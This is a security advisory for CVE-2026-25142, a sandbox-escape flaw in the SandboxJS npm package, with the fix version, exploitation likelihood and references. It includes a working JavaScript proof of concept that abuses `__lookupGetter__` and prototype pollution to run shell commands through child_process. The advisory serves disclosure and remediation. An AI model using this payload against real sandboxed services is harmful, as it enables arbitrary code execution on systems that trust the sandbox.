CVE-2026-25142

Description

### Summary SandboxJS does not properly restrict `__lookupGetter__` which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution. ### Details https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398 The Object prototype which contains `__lookupGetter__` is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype. ### PoC ```js const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` let getProto = Object.toString.__lookupGetter__("__proto__") let m = getProto.call(new Map()); m.has = isFinite; console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );` sb.compile(payload)().run(); ``` ### Impact Prototype Pollution -> RCE

How to fix CVE-2026-25142

To remediate CVE-2026-25142, upgrade the affected package to a fixed version below.

• —upgrade to 0.8.27 or later

Is CVE-2026-25142 being exploited?

Low — EPSS is 0.3%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• from 0, < 0.8.27

CVSS scores

References (5)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2026-25142
• PATCHgithub.com/nyariv/SandboxJS
• WEBgithub.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398
• WEBgithub.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3